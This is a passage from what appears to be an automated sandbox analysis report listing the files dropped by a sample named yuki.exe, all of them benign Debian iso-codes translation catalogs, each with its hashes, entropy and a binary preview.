                                                                                                    Entropy (8bit):5.362255503008239
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iGlD1xjt02UkLKcG/Ki4FLZLXmBQWihjEl:h5t0UPKKzFlLXm6M
                                                                                                    MD5:8016B7DB3E1AF9C18D5DEF26DBB765D0
                                                                                                    SHA1:3CA2885942E47308D91A70AEBB4EDC897B7D0201
                                                                                                    SHA-256:5B399D6BEE7CF72B8506EC7013D37186290FDEC8E067419F37401633F4BA6471
                                                                                                    SHA-512:3D0FF847336C7A8A32C55692F7746851A7A425B760B4FE14FAE7E0468D67A3E917FB35EE72ACF49324A1EEFCEA3132D06C46F06A9430EC01018D43976CB72C06
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...P...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Tigrinya.Language: ti.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 122 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5858
                                                                                                    Entropy (8bit):4.929516002686295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:o45T1/kqoi01+uYQPB5RlbP/m5KbpH95MNLA+Fsk2pL5lsx2Or8ZFdjVoEP0GCuk:hBL2nYu5RlD/uK99qVilIkOr8ZrjnMuk
                                                                                                    MD5:EBDC3D911D70CF1C8A0E9FABB21DFAD6
                                                                                                    SHA1:61483AAF72B013BE3D29A27CA332AF5F2E83DA68
                                                                                                    SHA-256:AEE753D35EB578C0ACEE90C1742BEC0F3542929ED4BBEDE83AE473544D164D7D
                                                                                                    SHA-512:AFE008158500EBB31A23BE6B9E2D3C03A1507FB0ADF68C6967DB74AA4CDBFF18D543B13ACAF78BDE88F787EE45A32258126FE907C2D551D8C7C89A6F1E9F33A2
                                                                                                    Malicious:false
                                                                                                    Preview:........z.......................H.......I.......S.......X.......b.......k.......s.......z............................................................................................................................................................... .......(.......2.......;.......C.......J.......R.......Y.......^.......g.......n.......v...............................................................................................................................................................".......*...............4.......<.......D.......O.......Z.......c.......m.......r.......z...............................................................................................................................................................................$.......+.......;.......E.......K.......S.......[.......a.......g.......m.......t.......y.......................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5712
                                                                                                    Entropy (8bit):5.024910911659017
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5sIkEGl1TiO89kjFbEylUyAbPcBwG7YG/wLYpoikXLyCviLz:i1Vy1s0FbEKtNZfoLz4
                                                                                                    MD5:48C158245EAFBA129508F68F174505AB
                                                                                                    SHA1:C9B4B36300C4D9D8C6A6BEEA18B7D36549AD0E2F
                                                                                                    SHA-256:56A10B36C58F0BC77419F9D1FA2DFDBA15AD4252760E19220E18630EF1EBC750
                                                                                                    SHA-512:7AD4893922E4ADA30FDD2E68F8F9FCDA5DFBB1870C78BFE6F192BD4A01F8389F1E673957CCCC06AFB6C91A34F4B8D4BD427713CFE757239592971603066CCC98
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................N...................&.......6.......C.......V.......f.......|.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):475
                                                                                                    Entropy (8bit):5.35763053537991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:il/Q1xjt02UkLKcG/Ki4FLZXZsXmBQWihjEl:UA5t0UPKKzFlXSXm6M
                                                                                                    MD5:798FA10E58A738EA4EC9F3A52ED2A7E1
                                                                                                    SHA1:AE123D010B9CF7D5BCECAB71B1BDAC2CECEDAABD
                                                                                                    SHA-256:9CD9FF0EE1EBE94015659D6F81B76189514021CFAA6DE133194D3EFCB6F248AA
                                                                                                    SHA-512:1C20C32BA22D74498F44F8394B718C56A1185F5A2590B3B4E1DBA90FEF8F47539132FA239F87E4880A9440F6A61F21687AA86F714B2316E9535B038F696B3967
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...N...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Tigre.Language: tig.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5697
                                                                                                    Entropy (8bit):4.867683621277235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHydrG+Kbpy95MobX/2pL5lsx2OrtZFdjVoEP0GCuk:k0u8pG+KU9qnlIkOrtZrjnMuk
                                                                                                    MD5:E29FBEB10E3102FEBCFDA99E23AADEC2
                                                                                                    SHA1:98491400CB70C46D57549BB01592B489A0394AD3
                                                                                                    SHA-256:5896030623F0648FCC4C527001CB9D43089999C9CF205BAB1E09349FF53CC546
                                                                                                    SHA-512:EE24CEE62A2695B83A5166F3BAF93369460A2C7BBCA7F82F2DE3D30A713A5D4CAD44D28806B19C6B26836925743EA3AA3300AECC006274C12D6A367425AC2D57
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................J...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 336 messages, Project-Id-Version: iso_3166-1 'Owganystan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18029
                                                                                                    Entropy (8bit):5.052227374226757
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ubgwz/I1qIx7VolwcPieRNNTDwhL8XP4dovAs2Y0IXIyKDNW:YCB67bcL8XP4dovAsDIyKDNW
                                                                                                    MD5:B51DDF4D36134C75727D521BCC57A561
                                                                                                    SHA1:AFA28860843D0E559153C348A51C756B26B9B81D
                                                                                                    SHA-256:3E534E9E733A134734A1BB563A9FD71E764F656B08CB9BF0F7180B97663736F8
                                                                                                    SHA-512:FACCF1220601F23A8A8407A0F4E7FD54AF171C0AB29CC06D295D6E3B8016EA99995E8AEAAF29755755058EDB8141D3C59FDCA0DC33333F76FC2DAA04402DB666
                                                                                                    Malicious:false
                                                                                                    Preview:........P....................... .......!.......-.......5.......=.......L.......T.......[.......o.......y...............................................................................................................................................&......./.......6.......M......._.......h.......u.......}...................................................................................%...........,.......7.......?.......D.......K.......Z...%...i...,.......*...........................................................(.......:.......B.......J.......S.......o...'...}........................................ ....... ......' ....... ......< ......L ......R ......d ......k ......s ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!......4!......=!......G!......O!......W!......r!......x!.......!.......!.......!.......!.......!.......!.......!......."......."......."......$"......*"......1"......<"......B"......U"......g"......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):416
                                                                                                    Entropy (8bit):5.267729352853025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilij+EYYxA9Ct0vOuvP0NXzffUvsaRD/RxFrXuAFRLXJhs9XmBQ8KMW0YEi9:i4Bxxjt02UkosaZ/bhjRLk9XmBQWi9
                                                                                                    MD5:EDC903C7981C28987392A709F249A3B6
                                                                                                    SHA1:183CD54BCD25668041B8DE831792632DDCA9C8D8
                                                                                                    SHA-256:38D5E8097FF2FDCC0E4329105401931E0B2CE4BA77828A4D00683BD7CD92022B
                                                                                                    SHA-512:6C792A3C11EA19CFBCB72BAFF4858B445096CE7BDA14FAA28197B6165874F1EABFFAC41B4BEDB3CCBA6EEB2A2800EEF8A367FE33376CE9B8C0B1DA7B9F994B0D
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...f...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-20 20:10I+0330.Last-Translator: Kakilik Group <kakilikgroup@yahoo.com>.Language-Team: Turkmen <kakilikgroup@yahoo.com>.Language: tk.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 386 messages, Project-Id-Version: iso_3166-1 'Apganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21411
                                                                                                    Entropy (8bit):4.976352465498494
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:rKLh4jnufhB3HqDe2gJzbj0bsfP4X2CA0cu3azYyO0dvKHAjyLF:rK9GnufhhKcJ/QbsfP4X2CA0WvO0dvKd
                                                                                                    MD5:2A57028CB3A9112A681B0981AD449A3C
                                                                                                    SHA1:F0B0517D46FCB82656A72B4BEA8C42F0BB5AFCBC
                                                                                                    SHA-256:27518A19E30336F90982388C8DB48D314C0DC29F2B18C8835AC1C67171816705
                                                                                                    SHA-512:4E5BE0959B63A7139FB69635391ED96F08063E02D180EC8FEC19A9A2D102BDEFF833AD574FAD05B81F2D35989D545D65005C1A748EF2385AD6FC839979D79E6D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......` ......a ......m ......u ......} ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......"!......*!......2!......=!......F!......N!......V!......]!......c!......k!.. ...r!.......!.......!.......!.......!.......!.......!.......!......."......."......!"......."......6"......?"......H"......O"......^"......w"......|"......."......."......."......."......."......."..,....".......#......$#..%...*#......P#......]#......h#......p#......u#......|#.......#..%....#..,....#.."....#..*....$......;$......C$......L$......U$......h$.......$.......$.......$.......$.......$.......$.......$.......$.......$..'....$.......%......7%......S%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......$&.......&......H&......O&......Y&......a&......l&......q&......{&.......&.......&.......&.......&.......&..!....&.......&.......&.......'.......'..0...''......X'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):477
                                                                                                    Entropy (8bit):5.1951573524627275
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:itlfz1xjt02Uk+/2BeqgBBQoZqkvvXmBQWitp:ez5t0Ui2OBQKXmm
                                                                                                    MD5:3D2EA1A2F7E1E8BEE44411687856BDCA
                                                                                                    SHA1:D5AF0563A8D03117E17965033AF63F5E96F7FEBD
                                                                                                    SHA-256:236834A214C084F9BFF5484049848D5FC5F0E20DE210F954BE2F87A3D9773493
                                                                                                    SHA-512:FBD9A38677B264086461E564B96AF43F849CB23EC03C8AFE418B56A6C1394513A02F22DA7E86674633E067E1CA6909FF7C8625CF0B65BBBE35D018B16B479561
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...a...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2006-10-18 22:59+0800.Last-Translator: Eric Pareja <xenos@upm.edu.ph>.Language-Team: Tagalog <debian-tl@banwa.upm.edu.ph>.Language: tl.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10222
                                                                                                    Entropy (8bit):5.141791432929215
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dHRBeUF3HiltU4WjV9qWxa5hW81lNqNd0BXT6wq8FhgmYO:97Z3Cg4WjVDxa5hW81/uSBX2wqYhgw
                                                                                                    MD5:37DDB53EF944B05CE93BAF409F5F1D7D
                                                                                                    SHA1:D47DD9A7049C8B1F6A95E2255675B3DEDF34902E
                                                                                                    SHA-256:2C1C86D6996E5EF12D5F9F0499248CD82D457A31BB38517A61D95A5AD94F440D
                                                                                                    SHA-512:5E5641C088BC6385C544253448D16A338B68D0405FB0B8576A194E52F9CE97F8EEA79587694E565776DAE3E8682D4B471463AAEAAC7861827CDBACCBF0564B4A
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23676
                                                                                                    Entropy (8bit):5.090174703081091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosINEPDNfruKfm546nbjz5wsWP48WAINiZGYoCf3EW:0oeDNfruKG48fmsWP48WAIEL
                                                                                                    MD5:62462B1AFD2C2521E878241CDE80E005
                                                                                                    SHA1:9D8B7691B8EF103E52B95EB480FD1F278602A417
                                                                                                    SHA-256:CABFFE58DD8242EC36D58C107A1762A428816CCB1350A4584E5AE22D4D19FCD7
                                                                                                    SHA-512:C0B4DF7BF3AF5B6AF038C047A40069A9988D4810F5575FA9528F000F9B28973E6C4F3ED8399EFB21CB9DFB40DAFAFB44B825078F7C19C9202FE64B855AB1E98D
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1916 messages, Project-Id-Version: iso_3166-2 'A'ana'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76675
                                                                                                    Entropy (8bit):4.975812813491527
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:ftCevNZjLwI1OIeHP6RPu4/sIkhMf8yH6mP6gKYh:ftC+bWDNrMf8yHt6gKY
                                                                                                    MD5:F4320BA429D4614932ED2100E920C4EB
                                                                                                    SHA1:C269899A32A9506333125CAF1868E76E7D713A10
                                                                                                    SHA-256:630003EE1CE2A8D2457FF6B1953822673512EDCD8875F47683CC48E1D98E728E
                                                                                                    SHA-512:AAE5BCC0278884FE106F552EE2163C518678A37A5F21519ED09F5474FE2E610DB83898F748264A00D4EEB028BE1427F069E270EEFE89A2E0CB287360921D9C03
                                                                                                    Malicious:false
                                                                                                    Preview:........|........;.......w.......................................................................................................(...............8.......G.......W.......a.......g.......m.......v.......z...................................................................................................................".......6.......B.......Q.......[.......e.......m.......w.................................................................................................................................!.......).......0.......7.......@.......N.......[.......c.......j.......q.......z.............................................................................................................................#.......+.......2.......9.......E.......M.......Z.......f.......r.......y...........................................................................................................................................................%.......*......./.......:.......B.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\304\260ngiliz Antarktika B\303\266lgesi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2771
                                                                                                    Entropy (8bit):5.291246116955787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3l8+AkOP+vGqIfdvqN5CoUvm5Qe9gmIax32MmDHqJJO:rLvl8+Bm+yaCo+kQyg6Z2P+JJO
                                                                                                    MD5:F22C77CB9C37F6FB77C20ADD26F907D1
                                                                                                    SHA1:C3974B99CC56740070025D9141FE5C673E05799E
                                                                                                    SHA-256:08D02EFA7B676961220D2F25DB359E2004BDBE8307443917F5550EF9F23CB623
                                                                                                    SHA-512:9D51771B835DEE57A35E49EAA221DA9FC306E77C7640A5DAE64430982E2644F617DD7150B15EECF6BF7792E59A9BFC20C9CD8E9574AF681FBAD91B0939F8831F
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................$.......,...........%...0...B.......s.......{...........................'...........................(.......8.......H.......[.......l...$...{...........................................-.........../.......I.......h...!...t...*....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 'ADB Hesap Birimi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9693
                                                                                                    Entropy (8bit):5.031914517427198
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFH4qEI9s6VRyK0G/2LCntxa5GwB4lJjwoH/7HtfUFtIs:SdH7O6TL0G/Uo/a5JB4TD/7N0r
                                                                                                    MD5:E890321C599B8D465DF480C32E519C4A
                                                                                                    SHA1:D680A09AB65637F2B17DD8F8D675E4D998D82207
                                                                                                    SHA-256:7D252BE9AC78C6331249AFF194E6DE063854C9EAE8599B8EB1B0AEC0D965794B
                                                                                                    SHA-512:E7C59380F5BAFACB24C85A20829639D5A0E3B57033C6C3111FF93907563B4BB135C33B62D84E349B410DBB62D392E0E329769CF4741D4017CE50005FA22B4EBF
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 8007 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):343245
                                                                                                    Entropy (8bit):5.281022846965223
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h+91nCLObo84q0i5mqL3XXZo1wuGLMlxxEbFbFo3PnBx0a2ZcuJg5hVt6QSMkA:obpbRLQCFoBSa2O8kqfA
                                                                                                    MD5:5D1AA6F4ABACEC75F4CC191310E09329
                                                                                                    SHA1:4943F51F6BD2F12A8717EE15C2F0BF71A94E6478
                                                                                                    SHA-256:F58453CBAE686E0DE4F81241B5A5892A0A28320D3F3D9E60D82CEDB369A3FC2A
                                                                                                    SHA-512:2A7210FD2F3932A3BD980CAC74568E94EF31A12E759AB9A19F1E377BB4F0ACFB91FCB8E73DB44761D7E711F5A055BEE7A2979E58703685888CD8176EABDFE161
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T....)....................................................................................................................................................................................>.......C.......H.......N.......R......._.......d.......i.......n.......t.......|.................................................................................................................................................$.......*.......1.......7.......>.......B.......L.......Z.......h.......p.......v.......}.................................................................................................................................................. .......'.......+.......0.......5.......I.......a.......w....................................................................................................$...............5.......A.......F.......N.......S.......Z.......`.......h.......o.......w.......~...............................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afrika-Asya dilleri'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7390
                                                                                                    Entropy (8bit):4.88127789499328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxNF5VGSE0BfNcamrHzQfLsxfvazO28Vj:XHnVJE0BfNcaYxGOhV
                                                                                                    MD5:BB4A718BE395D1F5937CE094EA89B84F
                                                                                                    SHA1:D3DF361F5CD67F8DCB30978956E47C3E1AF2BE9D
                                                                                                    SHA-256:E8D850FBF2D55E39CE22788495ECAF0C98DD7CF536E1FBB1DA86B5C506F48980
                                                                                                    SHA-512:33304880887BFB767E8DA37AC89115211BAA5E39FDDD37AAA3E9B6E592C07258686DFB3376A0224420BAEE8C8E81C2A953745A8AD1D8ABE5CBD64F597E1B32BC
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 344 messages, Project-Id-Version: iso_3166-1 '\303\204f\304\237\303\244nstan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18209
                                                                                                    Entropy (8bit):5.117187723119706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:elUO91PrvvVfYzlDtbzMEpAayL8fP4PoJA5/m3LrXm0BX7:mvSxz3ilL8fP4PoJA5KLrXB97
                                                                                                    MD5:25DAB27160DA0971434BD22DB9F4ABDF
                                                                                                    SHA1:CD1E5D28EE72E602CDF5CF08CF0266E856FE8B21
                                                                                                    SHA-256:D07B59D6939C62F622411A5AC0DA7DA4CCBE96A88A8C9C9823D7DF5E8AE6F1FD
                                                                                                    SHA-512:B1BC8097144C6BD48C35F5AE35F6DFB9947F9D42A50409D082B0CB9C3E9DBD0143AFB6BA5A4F996AA77DF316BB7F79D3B103ADBED2A22D23EF3841A863D70236
                                                                                                    Malicious:false
                                                                                                    Preview:........X.......................................................................................................3.......J.......T.......g.......o.......u.......................................................................................................................................................6.......H.......Q.......^.......f.......o.......x...................................................................................%...................+.......6.......>.......C.......J.......Y.......h.......p.......y........................................................................................ ...... ......% ......- ......4 ......B ......S ......c ......i ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......$!......,!......G!......M!......W!......q!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......*"......<"......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Niderland Antill\303\244re'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):492
                                                                                                    Entropy (8bit):5.213320274750806
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWPyNNGYxA9Ct0vOuvP0NXzff6Qe/REcJOLqL2AFAtLqLBFlasXmBQ8KMW0YE1:iZ1xjt02Uki7/CqLLIqLXXmBQWiDFw
                                                                                                    MD5:43BD9CDC85E028BAE472C8C92FF3275A
                                                                                                    SHA1:B1B9B11264751BF7C570445939037390F35338E8
                                                                                                    SHA-256:1CA6936986B3AD1600DDC12AE88EA316129501C548AF52E3D1BFB00CA283439F
                                                                                                    SHA-512:504AF718ABA7C0BEA6959316D0D1B806E89EFDFA51C149B404E18B96EF84BC6F35FBEE587C2BEBE13362A6B273E1335B47A2E232EE924C1367EAE54BB48EE8F4
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...p...f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2005-10-21 15:11+0300.Last-Translator: Albert Fazl. <tatarish.l10n@gmail.com>.Language-Team: Tatarish <tatarish.l10n@gmail.com>.Language: tt@iqtelif.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Niderland Antill.re.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 150 messages, Project-Id-Version: iso_639-3 'Abxaz\303\247a'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6381
                                                                                                    Entropy (8bit):4.712240195420643
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kTlQrqjUlhjK4gn9mNNfh70wSASCtlmXMZ6klESJWSf+9AGV84b1kBTBDQy6na:erj0he4GAN0wSuWcZ+HSmHXqLDQ5na
                                                                                                    MD5:1A51977E372586D38702A33021BF38CB
                                                                                                    SHA1:849EA311F947613949A78CBE558776E46E1C28F2
                                                                                                    SHA-256:631C50538A9D0345F3477A4092E37751CE75BE0468A4BD6E53A48B16E0BFACDF
                                                                                                    SHA-512:97A5924F49FFBFC56795D538E884419CA506B4153BF30F1EBC9BE4F102790AE3377724EBF043E381C1C6C16FCE06771F2218826AD886D5F0BCA5E6536BA78BE6
                                                                                                    Malicious:false
                                                                                                    Preview:........................|.......................................................................................................'......./.......6.......A.......I.......Q.......Y.......`.......j.......r.......z.......................................................................................................................................................................".......).......1.......:.......@.......G.......N.......T.......^.......h.......l.......w...............................................................................................................................................................................'.......2.......;.......E.......M.......R.......X.......`.......g.......q.......w...............................................................................................................................................................).......1.......7.......>.......E.......O.......V.......f.......n.......x.......~.......................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 344 messages, Project-Id-Version: iso_3166-1 '\323\230\321\204\320\263\323\231\320\275\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21810
                                                                                                    Entropy (8bit):5.354977761429232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:elUO91Prvv4IvEpAayL8fP4PoJA5/mcYwO2ZmWydPTkcAq/Qf:mv4IcilL8fP4PoJA5hYwaWyxTk5q/6
                                                                                                    MD5:A4DDF657E1EC0AA0B73F9B414BE11390
                                                                                                    SHA1:2AC8EE5066AE3DC1DE269F928F2EFADF3F792025
                                                                                                    SHA-256:81D60E42FF70E2539EA70CB225B0951D8BF33F9886BEBAFE542EE884AA479B66
                                                                                                    SHA-512:9F4A00953509926433FE0D69B3705C1BAF6EADAF98F905002283F95CDFC1689D98D1CC6E31339F93076AE8688E7AA5D1411EFD41FF4516F0562313D8D78D69C8
                                                                                                    Malicious:false
                                                                                                    Preview:........X.......................................................................................................3.......J.......T.......g.......o.......u.......................................................................................................................................................6.......H.......Q.......^.......f.......o.......x...................................................................................%...................+.......6.......>.......C.......J.......Y.......h.......p.......y........................................................................................ ...... ......% ......- ......4 ......B ......S ......c ......i ......{ ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!......$!......,!......G!......M!......W!......q!......v!......~!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......*"......<"......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\320\235\320\270\320\264\320\265\321\200\320\273\320\260\320\275\320\264 \320\220\320\275\321\202\320\270\320\273\320\273\323\231\321\200\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):501
                                                                                                    Entropy (8bit):5.413108571669986
